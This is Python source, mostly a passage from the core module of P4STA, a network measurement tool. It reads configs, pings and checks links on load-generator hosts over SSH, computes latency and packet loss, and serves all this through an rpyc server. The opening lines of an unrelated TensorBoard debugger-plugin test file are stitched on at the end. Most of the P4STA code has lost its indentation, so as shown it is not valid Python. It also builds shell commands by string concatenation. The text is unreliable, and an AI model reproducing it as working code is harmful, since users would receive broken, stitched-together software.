target = self.get_stamper_target_obj(
P4STA_utils.read_current_cfg()["selected_target"])
else:
target = self.get_stamper_target_obj(target_name)
with open(os.path.join(target.realPath, "target_config.json"),
"r") as f:
return json.load(f)
except Exception:
P4STA_utils.log_error(
"CORE Exception in get_target_cfg: " + traceback.format_exc())
return {}
def get_available_cfg_files(self):
lst = []
folder_path = os.path.join(project_path, "data")
all_files = [f for f in os.listdir(folder_path) if
os.path.isfile(os.path.join(folder_path, f))]
for f in all_files:
if f == "config.json":
continue
if f.endswith(".json"):
lst.append(f)
try:
date_time_objects = []
all_targets = self.get_all_targets()
for filename in lst:
# only match json files with valid names like bmv2_
match = False
for target in all_targets:
if filename.startswith(target):
match = True
break
if match:
# e.g. tofino_model_01.08.2020-16:19:06.json
datestr = filename.split("_")[-1].split(".json")[0]
date_time_objects.append([filename,
datetime.datetime.strptime(
datestr,
'%d.%m.%Y-%H:%M:%S')])
# now sort list of date_list by date (index 1)
date_time_objects.sort(key=lambda x: x[1], reverse=True)
final = []
for time_list in date_time_objects:
final.append(time_list[0])
return final
except Exception:
print("EXCEPTION get_available_cfg_files")
print(traceback.format_exc())
return lst
def read_result_cfg(self, run_id):
path = os.path.join(project_path, "results", str(run_id),
"config_" + str(run_id) + ".json")
return self.open_cfg_file(path)
def get_template_cfg_path(self, stamper_target_name):
target = self.get_stamper_target_obj(stamper_target_name)
path = target.getFullTemplatePath()
return path
def open_cfg_file(self, path):
my_file = Path(path)
if not my_file.is_file():
print("open_cfg_file: " + path + "; not found.")
return None
with open(path, "r") as f:
cfg = json.load(f)
return cfg
def delete_by_id(self, file_id):
try:
shutil.rmtree(P4STA_utils.get_results_path(file_id))
except Exception as e:
print(e)
def get_ports(self):
cfg = P4STA_utils.read_current_cfg()
target = self.get_stamper_target_obj(cfg["selected_target"])
return target.port_lists()
def getAllMeasurements(self):
found = []
try:
folder = os.path.join(project_path, "results")
for f in os.listdir(folder):
path_to_res_folder = os.path.join(folder, f)
if os.path.isdir(path_to_res_folder):
for file in os.listdir(path_to_res_folder):
if "timestamp1" in file:
found.append(f)
except FileNotFoundError:
print(
"Directory 'results' not found. No older datasets available.")
found.sort(reverse=True)
return found
    def getLatestMeasurementId(self):
        measurements = self.getAllMeasurements()
        if len(measurements) > 0:
            return measurements[0]
        return None
def start_loadgens(self, duration, l4_selected="tcp",
packet_size_mtu="1500", loadgen_rate_limit=0,
loadgen_flows=3, loadgen_server_groups=[1]):
cfg = P4STA_utils.read_current_cfg()
loadgen = self.get_loadgen_obj(cfg["selected_loadgen"])
loadgen.run_loadgens(str(P4staCore.measurement_id), duration,
l4_selected, packet_size_mtu,
self.get_current_results_path(),
loadgen_rate_limit, loadgen_flows,
loadgen_server_groups)
return P4staCore.measurement_id
# after loadgen test
def process_loadgens(self, file_id):
cfg = self.read_result_cfg(file_id)
loadgen = self.get_loadgen_obj(cfg["selected_loadgen"])
results = loadgen.process_loadgen_data(
str(file_id), P4STA_utils.get_results_path(file_id))
output, total_bits, error, total_retransmits, \
total_byte, custom_attr, to_plot = results
if not error:
print(to_plot)
for key, value in to_plot.items():
print("key: " + key + " value: " + str(value))
analytics.plot_graph(value["value_list_input"],
value["index_list"], value["titel"],
value["x_label"],
value["y_label"], value["filename"],
value["adjust_unit"],
value["adjust_y_ax"], file_id)
with open(os.path.join(P4STA_utils.get_results_path(file_id),
"output_loadgen_" + str(file_id) + ".txt"),
"w+") as f:
f.write("Used Loadgenerator: " + loadgen.get_name())
f.write("Total meaured speed: " + str(
analytics.find_unit_bit_byte(total_bits, "bit")[0]) + " " +
analytics.find_unit_bit_byte(total_bits, "bit")[
1] + "/s" + "\n")
f.write("Total measured throughput: " + str(
analytics.find_unit_bit_byte(total_byte, "byte")[
0]) + " " +
analytics.find_unit_bit_byte(total_byte, "byte")[
1] + "\n")
f.write("Total retransmitted packets: " + str(
total_retransmits) + " Packets" + "\n")
for key, value in custom_attr["elems"].items():
try:
f.write(value + "\n")
except Exception:
pass
return output, total_bits, error, total_retransmits, \
total_byte, custom_attr, to_plot
def deploy(self):
target = self.get_stamper_target_obj(
P4STA_utils.read_current_cfg()["selected_target"])
print(target)
error = target.deploy(P4STA_utils.read_current_cfg())
print(error)
if error is not None and error != "":
P4STA_utils.log_error(error)
return error
def ping(self):
cfg = P4STA_utils.read_current_cfg()
output = []
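        # Count active DUT ports: with more than one, load generators ping
        # hosts in the other groups; with exactly one, they ping the other
        # hosts inside their own group.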
use_port_counter = 0
for dut in cfg["dut_ports"]:
if dut["use_port"] == "checked":
use_port_counter = use_port_counter + 1
if use_port_counter > 1:
for loadgen_grp in cfg["loadgen_groups"]:
for host in loadgen_grp["loadgens"]:
for loadgen_grp2 in cfg["loadgen_groups"]:
if loadgen_grp is not loadgen_grp2:
output += ['-----------------------',
'Host: ' + host['loadgen_ip'],
'-----------------------']
for dst_host in loadgen_grp2["loadgens"]:
output += P4STA_utils.execute_ssh(
host["ssh_user"], host["ssh_ip"],
self.check_ns(
host) + " timeout 1 ping " + str(
dst_host[
"loadgen_ip"]) + " -i 0.2 -c 3")
elif use_port_counter == 1:
for loadgen_grp in cfg["loadgen_groups"]:
if loadgen_grp["use_group"] == "checked":
for host in loadgen_grp["loadgens"]:
for dst_host in loadgen_grp["loadgens"]:
if host["id"] != dst_host["id"]:
output += P4STA_utils.execute_ssh(
host["ssh_user"], host["ssh_ip"],
self.check_ns(
host) + " timeout 1 ping " + str(
dst_host[
"loadgen_ip"]) + " -i 0.2 -c 3")
return output
def read_stamperice(self):
target = self.get_stamper_target_obj(
P4STA_utils.read_current_cfg()["selected_target"])
cfg = target.read_stamperice(P4STA_utils.read_current_cfg())
with open(os.path.join(self.get_current_results_path(),
"stamper_" + str(
P4staCore.measurement_id) + ".json"),
"w") as write_json:
json.dump(cfg, write_json, indent=2, sort_keys=True)
if cfg["delta_counter"] == 0:
average = 0
else:
average = cfg["total_deltas"] / cfg["delta_counter"]
with open(os.path.join(self.get_current_results_path(),
"output_stamperice_" + str(
P4staCore.measurement_id) + ".txt"),
"w+") as f:
try:
f.write(
"###################################"
"#############################################\n")
f.write("######## Results from Stamper for ID " + str(
P4staCore.measurement_id) + " from " + str(
time.strftime('%H:%M:%S %d.%m.%Y', time.localtime(
int(P4staCore.measurement_id)))) + " ########\n")
f.write(
"#### The chosen ID results from the time"
" where the external hosts started. #####\n")
f.write(
"#######################################"
"#########################################\n\n")
f.write("Measured for all timestamped packets:" + "\n")
f.write("Average Latency: " + str(
round(analytics.find_unit([average])[0][0],
2)) + " " + str(
analytics.find_unit([average])[1]) + "\n")
f.write("Min Latency: " + str(
analytics.find_unit([cfg["min_delta"]])[0][0]) + " " + str(
analytics.find_unit([cfg["min_delta"]])[1]) + "\n")
f.write("Max Latency: " + str(
analytics.find_unit([cfg["max_delta"]])[0][0]) + " " + str(
analytics.find_unit([cfg["max_delta"]])[1]) + "\n\n")
f.write("Measured for all timestamped packets:" + "\n")
            # Store packetloss between DUT port and destination ports
            # (where flows arrive after egressing the DUT)
num_ingress_packets = 0
num_egress_packets = 0
num_ingress_stamped_packets = 0
num_egress_stamped_packets = 0
packetloss_percent = 0
packetloss_percent_stamped = 0
for dut in cfg["dut_ports"]:
if dut["use_port"] == "checked":
num_ingress_packets += dut["num_ingress_packets"]
num_egress_packets += dut["num_egress_packets"]
num_ingress_stamped_packets += dut[
"num_ingress_stamped_packets"]
num_egress_stamped_packets += dut[
"num_egress_stamped_packets"]
packetloss = num_egress_packets - num_ingress_packets
packetloss_stamped = \
num_egress_stamped_packets - num_ingress_stamped_packets
if num_egress_packets > 0:
packetloss_percent = round(
(packetloss / num_egress_packets) * 100, 2)
if num_egress_stamped_packets > 0:
packetloss_percent_stamped = round(
(packetloss_stamped / num_egress_stamped_packets
) * 100, 2)
f.write("Packetloss for DUT: " + str(
packetloss_stamped) + " of " + str(
num_egress_stamped_packets) + " Packets (" + str(
packetloss_percent_stamped) + "%)" + "\n")
f.write("Measured for all packets (on port base):" + "\n")
f.write(
"Packetloss for DUT: " + str(packetloss) + " of " + str(
num_egress_packets) + " Packets (" + str(
packetloss_percent) + "%)" + "\n")
except Exception:
print(traceback.format_exc())
f.write("\n Exception:")
f.write("\n" + str(traceback.format_exc()))
for word in ["", "_stamped"]:
if word == "_stamped":
f.write("\n\nMeasured for timestamped packets only:")
else:
f.write("\nMeasure for all packets:")
f.write(
"\n----------------- INGRESS -----------------||"
"|---------------- EGRESS ------------------\n")
table = [
["IN", "GBytes", "Packets", "Ave Size (Byte)", "GBytes",
"Packets", "Ave Size (Byte)", "OUT"]]
try:
for loadgen_grp in cfg["loadgen_groups"]:
if loadgen_grp["use_group"] == "checked":
for host in loadgen_grp["loadgens"]:
selected_dut = {}
for dut in cfg["dut_ports"]:
if loadgen_grp["group"] == dut["id"]:
selected_dut = dut
break
try:
table.append(
[host["real_port"],
round(host["num_ingress" + word +
"_bytes"] / 1000000000, 2),
host["num_ingress" +
word + "_packets"],
round(host["num_ingress" + word +
"_bytes"] / host[
"num_ingress" + word + "_packets"],
2),
round(selected_dut["num_egress" +
word + "_bytes"
] / 1000000000, 2),
selected_dut["num_egress" + word +
"_packets"],
round(selected_dut["num_egress" +
word + "_bytes"] /
selected_dut["num_egress" +
word + "_packets"],
2),
selected_dut["real_port"]])
except ZeroDivisionError:
table.append(
[host["real_port"], "err: could be 0",
host[
"num_ingress" + word + "_packets"],
"err: could be 0",
"err: could be 0", selected_dut[
"num_egress" + word + "_packets"],
"err: could be 0",
selected_dut["real_port"]])
for loadgen_grp in cfg["loadgen_groups"]:
if loadgen_grp["use_group"] == "checked":
for host in loadgen_grp["loadgens"]:
selected_dut = {}
for dut in cfg["dut_ports"]:
if loadgen_grp["group"] == dut["id"]:
selected_dut = dut
break
try:
table.append(
[selected_dut["real_port"],
round(selected_dut["num_ingress" +
word + "_bytes"] /
1000000000, 2),
selected_dut["num_ingress" + word +
"_packets"],
round(selected_dut["num_ingress" +
word + "_bytes"] /
selected_dut["num_ingress" +
word + "_packets"],
2),
round(host["num_egress" + word +
"_bytes"] / 1000000000,
2), host["num_egress" + word +
"_packets"],
round(host["num_egress" + word +
"_bytes"] / host[
"num_egress" + word + "_packets"],
2),
host["real_port"]])
except ZeroDivisionError:
table.append(
[host["real_port"], "err: could be 0",
host[
"num_ingress" + word + "_packets"],
"err: could be 0",
"err: could be 0", selected_dut[
"num_egress" + word + "_packets"],
"err: could be 0",
selected_dut["real_port"]])
except Exception as e:
print(traceback.format_exc())
table.append(["Error: " + str(e)])
# creates table with the help of tabulate module
f.write(tabulate(table, tablefmt="fancy_grid"))
def stamper_results(self, file_id):
def adjust_byte_unit(val):
if round(val / 1000000000, 2) > 1:
return str(round(val / 1000000000, 2)) + " GB"
elif round(val / 1000000, 2) > 1:
return str(round(val / 1000000, 2)) + " MB"
else:
return str(round(val / 1000, 2)) + " kB"
time_created = "not available"
try:
time_created = time.strftime('%H:%M:%S %d.%m.%Y',
time.localtime(int(file_id)))
except Exception:
pass
try:
results_path = P4STA_utils.get_results_path(file_id)
my_file = Path(results_path + "/stamper_" + str(file_id) + ".json")
if not my_file.is_file():
# to maintain backward compatibility try for p4_dev_ instead
my_file2 = Path(
results_path + "/p4_dev_" + str(file_id) + ".json")
if not my_file2.is_file():
raise Exception(
"stamper_" + str(file_id) + ".json or p4_dev_" + str(
file_id) + ".json not found in " + results_path)
else:
file_str = "/p4_dev_"
else:
file_str = "/stamper_"
with open(P4STA_utils.get_results_path(file_id) + file_str + str(
file_id) + ".json", "r") as file:
sw = json.load(file)
except Exception as e:
P4STA_utils.log_error("CORE Exception: " + traceback.format_exc())
return {"error": traceback.format_exc()}
if sw["delta_counter"] != 0:
average = sw["total_deltas"] / sw["delta_counter"]
else:
average = 0
range_delta = sw["max_delta"] - sw["min_delta"]
sw["average"] = analytics.find_unit([average])
sw["min_delta"] = analytics.find_unit(sw["min_delta"])
sw["max_delta"] = analytics.find_unit(sw["max_delta"])
sw["range"] = analytics.find_unit(range_delta)
sw["pkt"] = sw["delta_counter"]
sw["time"] = time_created
sw["filename"] = file_id
###################################################
# compute avg packet sizes ###############
# compute total throughput ###############
###################################################
for dut in sw["dut_ports"]:
if dut["use_port"] == "checked":
if dut["num_ingress_packets"] > 0:
dut["avg_packet_size_ingress"] = round(
dut["num_ingress_bytes"] / dut["num_ingress_packets"],
1)
else:
dut["avg_packet_size_ingress"] = 0
if dut["num_ingress_stamped_packets"] > 0:
dut["avg_packet_size_ingress_stamped"] = round(
dut["num_ingress_stamped_bytes"] / dut[
"num_ingress_stamped_packets"], 1)
else:
dut["avg_packet_size_ingress_stamped"] = 0
if dut["num_egress_packets"] > 0:
dut["avg_packet_size_egress"] = round(
dut["num_egress_bytes"] / dut["num_egress_packets"], 1)
else:
dut["avg_packet_size_egress"] = 0
if dut["num_egress_stamped_packets"] > 0:
dut["avg_packet_size_egress_stamped"] = round(
dut["num_egress_stamped_bytes"] / dut[
"num_egress_stamped_packets"], 1)
else:
dut["avg_packet_size_egress_stamped"] = 0
dut["throughput_gbyte_ingress"] = adjust_byte_unit(
dut["num_ingress_bytes"])
dut["throughput_gbyte_ingress_stamped"] = adjust_byte_unit(
dut["num_ingress_stamped_bytes"])
dut["throughput_gbyte_egress"] = adjust_byte_unit(
dut["num_egress_bytes"])
dut["throughput_gbyte_egress_stamped"] = adjust_byte_unit(
dut["num_egress_stamped_bytes"])
for loadgen_grp in sw["loadgen_groups"]:
if loadgen_grp["use_group"] == "checked":
for port in loadgen_grp["loadgens"]:
port["avg_packet_size_ingress"] = port[
"avg_packet_size_egress"] = 0
port["avg_packet_size_ingress_stamped"] = port[
"avg_packet_size_egress_stamped"] = 0
if port["num_ingress_packets"] > 0:
port["avg_packet_size_ingress"] = round(
port["num_ingress_bytes"] / port[
"num_ingress_packets"], 1)
if port["num_egress_packets"] > 0:
port["avg_packet_size_egress"] = round(
port["num_egress_bytes"] / port[
"num_egress_packets"], 1)
try:
if port["num_ingress_stamped_packets"] > 0:
port["avg_packet_size_ingress_stamped"] = round(
port["num_ingress_stamped_bytes"] / port[
"num_ingress_stamped_packets"], 1)
if port["num_egress_stamped_packets"] > 0:
port["avg_packet_size_egress_stamped"] = round(
port["num_egress_stamped_bytes"] / port[
"num_egress_stamped_packets"], 1)
port["throughput_gbyte_ingress_stamped"] = \
adjust_byte_unit(
port["num_ingress_stamped_bytes"])
port[
"throughput_gbyte_egress_stamped"] = \
adjust_byte_unit(
port["num_egress_stamped_bytes"])
# if target has stamped counter not implemented yet
except KeyError:
print(traceback.format_exc())
port["throughput_gbyte_ingress"] = adjust_byte_unit(
port["num_ingress_bytes"])
port["throughput_gbyte_egress"] = adjust_byte_unit(
port["num_egress_bytes"])
# ext_host ingress throughput is ignored
sw["ext_host_throughput_egress"] = adjust_byte_unit(
sw["ext_host_num_egress_bytes"])
sw["ext_host_throughput_egress_stamped"] = adjust_byte_unit(
sw["ext_host_num_egress_stamped_bytes"])
if sw["ext_host_num_egress_packets"] > 0:
sw["ext_host_avg_packet_size_egress"] = round(
sw["ext_host_num_egress_bytes"] / sw[
"ext_host_num_egress_packets"], 1)
else:
sw["ext_host_avg_packet_size_egress"] = 0
if sw["ext_host_num_egress_stamped_packets"] > 0:
sw["ext_host_avg_packet_size_egress_stamped"] = round(
sw["ext_host_num_egress_stamped_bytes"] / sw[
"ext_host_num_egress_stamped_packets"], 1)
else:
sw["ext_host_avg_packet_size_egress_stamped"] = 0
###################################################
# compute packet losses ##################
###################################################
        # If only one DUT port is used, dst_dut should be the same. Store
        # packetloss between the DUT port and the destination ports (where
        # flows arrive after egressing the DUT).
num_ingress_packets = 0
num_egress_packets = 0
num_ingress_stamped_packets = 0
num_egress_stamped_packets = 0
for dut in sw["dut_ports"]:
if dut["use_port"] == "checked":
num_ingress_packets += dut["num_ingress_packets"]
num_egress_packets += dut["num_egress_packets"]
num_ingress_stamped_packets += dut[
"num_ingress_stamped_packets"]
num_egress_stamped_packets += dut["num_egress_stamped_packets"]
sw["dut_stats"] = {}
sw["dut_stats"]["total_num_egress_packets"] = num_egress_packets
sw["dut_stats"][
"total_num_egress_stamped_packets"] = num_egress_stamped_packets
count = 0
checked_dut_indexes = []
for dut in sw["dut_ports"]:
if dut["use_port"] == "checked":
checked_dut_indexes.append(count)
count = count + 1
# dual_port_mode activated if 2 dut ports are used
# => calc packetloss for 2 separate flows
sw["dut_stats"]["dut_dual_port_mode"] = (count == 2)
if sw["dut_stats"]["dut_dual_port_mode"]:
for i, z in [(0, 1), (1, 0)]:
c_i = checked_dut_indexes[i]
c_z = checked_dut_indexes[z]
sw["dut_ports"][c_i]["packetloss"] = \
sw["dut_ports"][c_i]["num_egress_packets"] - \
sw["dut_ports"][c_z]["num_ingress_packets"]
if sw["dut_ports"][c_i]["num_egress_packets"] > 0:
sw["dut_ports"][c_i]["packetloss_percent"] = round(
(sw["dut_ports"][c_i]["packetloss"] / sw[
"dut_ports"][c_i]["num_egress_packets"]) * 100, 2)
else:
sw["dut_ports"][c_i]["packetloss_percent"] = 0
sw["dut_ports"][c_i]["packetloss_stamped"] = \
sw["dut_ports"][c_i]["num_egress_stamped_packets"] - \
sw["dut_ports"][c_z]["num_ingress_stamped_packets"]
if sw["dut_ports"][c_i]["num_egress_stamped_packets"] > 0:
sw["dut_ports"][c_i]["packetloss_stamped_percent"] = round(
(sw["dut_ports"][c_i]["packetloss_stamped"] / sw[
"dut_ports"][c_i][
"num_egress_stamped_packets"]) * 100, 2)
else:
sw["dut_ports"][c_i]["packetloss_stamped_percent"] = 0
sw["dut_stats"][
"total_packetloss"] = num_egress_packets - num_ingress_packets
if sw["dut_stats"]["total_packetloss"] > 0:
sw["dut_stats"]["total_packetloss_percent"] = round(
(sw["dut_stats"][
"total_packetloss"] / num_egress_packets) * 100, 2)
else:
sw["dut_stats"]["total_packetloss_percent"] = 0
sw["dut_stats"]["total_packetloss_stamped"] = \
num_egress_stamped_packets - num_ingress_stamped_packets
if sw["dut_stats"]["total_packetloss_stamped"] > 0:
sw["dut_stats"]["total_packetloss_stamped_percent"] = round(
(sw["dut_stats"]["total_packetloss_stamped"] /
num_egress_stamped_packets) * 100, 2)
else:
sw["dut_stats"]["total_packetloss_stamped_percent"] = 0
return sw
# resets registers in p4 device
def reset(self):
target = self.get_stamper_target_obj(
P4STA_utils.read_current_cfg()["selected_target"])
ret_val = target.reset_p4_registers(P4STA_utils.read_current_cfg())
if ret_val is None:
ret_val = ""
return ret_val
def check_ns(self, host):
if "namespace_id" in host:
return "sudo ip netns exec " + str(host["namespace_id"])
else:
return ""
def stamper_status(self):
def check_host(host):
            pingresp = (os.system("timeout 1 ping " + host[
                "ssh_ip"] + " -c 1") == 0)  # True if the host answered the ping
host["reachable"] = pingresp
if pingresp:
output_host = "\n".join(
P4STA_utils.execute_ssh(host["ssh_user"], host["ssh_ip"],
self.check_ns(
host) + " sudo ethtool " +
host["loadgen_iface"]))
pos = output_host.find("Link detected")
try:
if str(output_host[pos + 15:pos + 18]) == "yes":
host["link"] = "up"
else:
host["link"] = "down"
except Exception:
host["link"] = "error"
else:
host["link"] = "down"
cfg = P4STA_utils.read_current_cfg()
target = self.get_stamper_target_obj(cfg["selected_target"])
lines_pm, running, dev_status = target.stamper_status(cfg)
threads = list()
for loadgen_group in cfg["loadgen_groups"]:
for host in loadgen_group["loadgens"]:
x = threading.Thread(target=check_host, args=(host,))
threads.append(x)
x.start()
for thread in threads:
thread.join()
return cfg, lines_pm, running, dev_status
def start_stamper_software(self):
target = self.get_stamper_target_obj(
P4STA_utils.read_current_cfg()["selected_target"])
return target.start_stamper_software(P4STA_utils.read_current_cfg())
def get_stamper_startup_log(self):
target = self.get_stamper_target_obj(
P4STA_utils.read_current_cfg()["selected_target"])
return target.get_stamper_startup_log(P4STA_utils.read_current_cfg())
def stop_stamper_software(self):
target = self.get_stamper_target_obj(
P4STA_utils.read_current_cfg()["selected_target"])
target.stop_stamper_software(P4STA_utils.read_current_cfg())
def reboot(self):
cfg = P4STA_utils.read_current_cfg()
for loadgen_grp in cfg["loadgen_groups"]:
for host in loadgen_grp["loadgens"]:
P4STA_utils.execute_ssh(host["ssh_user"], host["ssh_ip"],
"sudo reboot")
def refresh_links(self):
cfg = P4STA_utils.read_current_cfg()
for loadgen_grp in cfg["loadgen_groups"]:
for host in loadgen_grp["loadgens"]:
P4STA_utils.execute_ssh(
host["ssh_user"], host["ssh_ip"],
self.check_ns(host) + " sudo ethtool -r " +
host["loadgen_iface"])
def set_new_measurement_id(self):
        file_id = str(int(round(
            time.time())))  # generate name: time in seconds since 1.1.1970
P4staCore.measurement_id = file_id
return file_id
def get_current_results_path(self):
return P4STA_utils.get_results_path(P4staCore.measurement_id)
def start_external(self):
file_id = str(P4staCore.measurement_id)
cfg = P4STA_utils.read_current_cfg()
target = self.get_stamper_target_obj(cfg["selected_target"])
lines_pm, running, dev_status = target.stamper_status(
P4STA_utils.read_current_cfg())
# backup current config (e.g. ports, speed) to results directory
if not os.path.exists(self.get_current_results_path()):
os.makedirs(self.get_current_results_path())
shutil.copy(project_path + "/data/config.json",
os.path.join(self.get_current_results_path(),
"config_" + str(
P4staCore.measurement_id) + ".json"))
multi = self.get_target_cfg()['stamping_capabilities'][
'timestamp-multi']
tsmax = self.get_target_cfg()['stamping_capabilities']['timestamp-max']
errors = ()
if running:
errors = self.get_current_extHost_obj().start_external(file_id,
multi=multi,
tsmax=tsmax)
if errors != ():
P4STA_utils.log_error(errors)
return running, errors
def stop_external(self):
try:
            if int(P4staCore.measurement_id) == -1:
                raise Exception("no measurement has been started yet")
stoppable = self.get_current_extHost_obj().stop_external(
P4staCore.measurement_id)
except Exception:
stoppable = False
self.read_stamperice()
return stoppable
    # writes results from the external host, using the analytics module's output
def external_results(self, measurement_id):
cfg = self.read_result_cfg(str(measurement_id))
extH_results = analytics.main(str(measurement_id), cfg["multicast"],
P4STA_utils.get_results_path(
measurement_id))
f = open(P4STA_utils.get_results_path(
measurement_id) + "/output_external_host_" + str(
measurement_id) + ".txt", "w+")
f.write("Results from externel Host for every " + str(
cfg["multicast"] + ". packet") + "\n")
f.write("Raw packets: " + str(
extH_results["num_raw_packets"]) + " Processed packets: " + str(
extH_results[
"num_processed_packets"]) + " Total throughput: " + str(
extH_results["total_throughput"]) + " Megabytes \n")
f.write("Min latency: " + str(
analytics.find_unit(extH_results["min_latency"])[0][
0]) + " " + str(
analytics.find_unit(extH_results["min_latency"])[1]))
f.write(" Max latency: " + str(
analytics.find_unit(extH_results["max_latency"])[0][
0]) + " " + str(
analytics.find_unit(extH_results["max_latency"])[1]))
f.write(" Average latency: " + str(
analytics.find_unit(extH_results["avg_latency"])[0][
0]) + " " + str(
analytics.find_unit(extH_results["avg_latency"])[1]) + "\n")
f.write("Min IPDV: " + str(
analytics.find_unit(extH_results["min_ipdv"])[0][0]) + " " + str(
analytics.find_unit(extH_results["min_ipdv"])[1]) + "\n")
f.write("Max IPDV: " + str(
analytics.find_unit(extH_results["max_ipdv"])[0][0]) + " " + str(
analytics.find_unit(extH_results["max_ipdv"])[1]) + "\n")
f.write("Average IPDV: " + str(
analytics.find_unit(extH_results["avg_ipdv"])[0][0]) + " " + str(
analytics.find_unit(extH_results["avg_ipdv"])[1])
+ " and abs(): " + str(
analytics.find_unit(extH_results["avg_abs_ipdv"])[0][
0]) + " " + str(
analytics.find_unit(extH_results["avg_abs_ipdv"])[1]) + "\n")
f.write("Min PDV: " + str(
analytics.find_unit(extH_results["min_pdv"])[0][0]) + " " + str(
analytics.find_unit(extH_results["min_pdv"])[1]) + "\n")
f.write("Max PDV: " + str(
analytics.find_unit(extH_results["max_pdv"])[0][0]) + " " + str(
analytics.find_unit(extH_results["max_pdv"])[1]) + "\n")
f.write("Average PDV: " + str(
analytics.find_unit(extH_results["avg_pdv"])[0][0]) + " " + str(
analytics.find_unit(extH_results["avg_pdv"])[1]) + "\n")
f.write("Min packet/s: " + str(
extH_results["min_packets_per_second"]) + " Max packet/s: " + str(
extH_results[
"max_packets_per_second"]) + " Average packet/s: " + str(
extH_results["avg_packets_per_second"]) + "\n")
f.close()
def fetch_interface(self, ssh_user, ssh_ip, iface, namespace=""):
return P4STA_utils.fetch_interface(ssh_user, ssh_ip, iface, namespace)
def set_interface(self, ssh_user, ssh_ip, iface, iface_ip, namespace=""):
if namespace == "":
line = subprocess.run(
[project_path + "/core/scripts/setIP.sh", ssh_user, ssh_ip,
iface, iface_ip], stdout=subprocess.PIPE).stdout.decode(
"utf-8")
else:
line = subprocess.run(
[project_path + "/core/scripts/setIP_namespace.sh", ssh_user,
ssh_ip, iface, iface_ip, namespace],
stdout=subprocess.PIPE).stdout.decode("utf-8")
# returns True on error, False on success
return not (line.find("worked") > -1 and line.find(
"ifconfig_success") > -1)
def execute_ssh(self, user, ip_address, arg):
return P4STA_utils.execute_ssh(user, ip_address, arg)
def check_sudo(self, user, ip_address):
return P4STA_utils.check_sudo(user, ip_address)
def fetch_mtu(self, user, ip_address, iface, namespace=""):
mtu = "0"
if namespace != "":
namespace = "sudo ip netns exec " + namespace + " "
lines = self.execute_ssh(
user, ip_address, namespace + "ip addr show " +
iface + " | grep mtu")
if len(lines) > 0:
mtu_ind = lines[0].find("mtu")
mtu = lines[0][mtu_ind + 4:].split(" ")[0]
if not mtu.isdigit():
mtu = "0"
return mtu
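# Parsing sketch (illustrative input, not from a live host): for a line like
#   "2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq state UP ..."
# lines[0].find("mtu") locates the token, the slice [mtu_ind + 4:] starts at
# "1500 qdisc ...", and split(" ")[0] yields "1500".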
def get_results_path(self, file_id):
return P4STA_utils.get_results_path(file_id)
def delete_namespace(self, ns, user, ssh_ip):
ns_list = self.execute_ssh(user, ssh_ip, "sudo ip netns list")
if ns in ns_list:
self.execute_ssh(user, ssh_ip, "sudo ip netns del " + ns)
return True
else:
return False
def status_overview(self):
cfg = P4STA_utils.read_current_cfg()
num_loadgens = 0
for loadgen_group in cfg["loadgen_groups"]:
num_loadgens = num_loadgens + len(loadgen_group["loadgens"])
results = [None] * (
num_loadgens + 3) # stores the return values from threads
# start threads
threads = list()
x = threading.Thread(target=self.get_stamper_target_obj(
cfg["selected_target"]).stamper_status_overview,
args=(results, 0, cfg))
threads.append(x)
x.start()
x = threading.Thread(
target=self.get_current_extHost_obj().ext_host_status_overview,
args=(results, 1, cfg))
threads.append(x)
x.start()
ind = 2
for loadgen_group in cfg["loadgen_groups"]:
if loadgen_group["use_group"] == "checked":
for host in loadgen_group["loadgens"]:
x = threading.Thread(target=self.get_loadgen_obj(
cfg["selected_loadgen"]).loadgen_status_overview,
args=(host, results, ind))
threads.append(x)
x.start()
ind = ind + 1
for thread in threads:
thread.join()
# collecting all results
for i in range(0, 2):
if results[i] is not None:
cfg = {**cfg, **results[i]}
else:
print("### results[" + str(i) + "] = NONE ###")
ind = 2
for loadgen_group in cfg["loadgen_groups"]:
if loadgen_group["use_group"] == "checked":
for host in loadgen_group["loadgens"]:
host["ssh_ping"] = results[ind]["ssh_ping"]
host["sudo_rights"] = results[ind]["sudo_rights"]
host["needed_sudos_to_add"] = results[ind][
"needed_sudos_to_add"]
host["fetched_ipv4"] = results[ind]["fetched_ipv4"]
host["fetched_mac"] = results[ind]["fetched_mac"]
host["fetched_prefix"] = results[ind]["fetched_prefix"]
host["up_state"] = results[ind]["up_state"]
host["ip_routes"] = results[ind]["ip_routes"]
host["namespaces"] = results[ind]["namespaces"]
if "custom_checks" in results[ind]:
host["custom_checks"] = results[ind]["custom_checks"]
ind = ind + 1
return cfg
if __name__ == '__main__':
s = rpyc.utils.server.ThreadedServer(
P4staCore(), port=6789, protocol_config={'allow_all_attrs': True,
'allow_public_attrs': True,
'sync_request_timeout': 10})
s.start()
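# A client could then connect via rpyc, e.g. (illustrative sketch):
#   import rpyc
#   conn = rpyc.connect("localhost", 6789,
#                       config={"allow_all_attrs": True})
#   core = conn.root  # proxy for the P4staCore service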
|
interactive_debugger_plugin_test.py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests end-to-end debugger interactive data server behavior.
This test launches an instance of InteractiveDebuggerPlugin as a separate thread.
The test then calls Session.run() using RunOptions pointing to the grpc:// debug
URL of the debugger data server. It then sends HTTP requests to the TensorBoard
backend endpoints to query and control the state of the Session.run().
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import json
import shutil
import tempfile
import threading
import numpy as np
import portpicker # pylint: disable=import-error
from six.moves import urllib # pylint: disable=wrong-import-order
import tensorflow as tf # pylint: disable=wrong-import-order
from tensorflow.python import debug as tf_debug # pylint: disable=wrong-import-order
from werkzeug import test as werkzeug_test # pylint: disable=wrong-import-order
from werkzeug import wrappers # pylint: disable=wrong-import-order
from tensorboard.backend import application
from tensorboard.backend.event_processing import plugin_event_multiplexer as event_multiplexer # pylint: disable=line-too-long
from tensorboard.plugins import base_plugin
from tensorboard.plugins.debugger import interactive_debugger_plugin
_SERVER_URL_PREFIX = '/data/plugin/debugger/'
class InteractiveDebuggerPluginTest(tf.test.TestCase):
def setUp(self):
super(InteractiveDebuggerPluginTest, self).setUp()
self._dummy_logdir = tempfile.mkdtemp()
self._dummy_multiplexer = event_multiplexer.EventMultiplexer({})
self._debugger_port = portpicker.pick_unused_port()
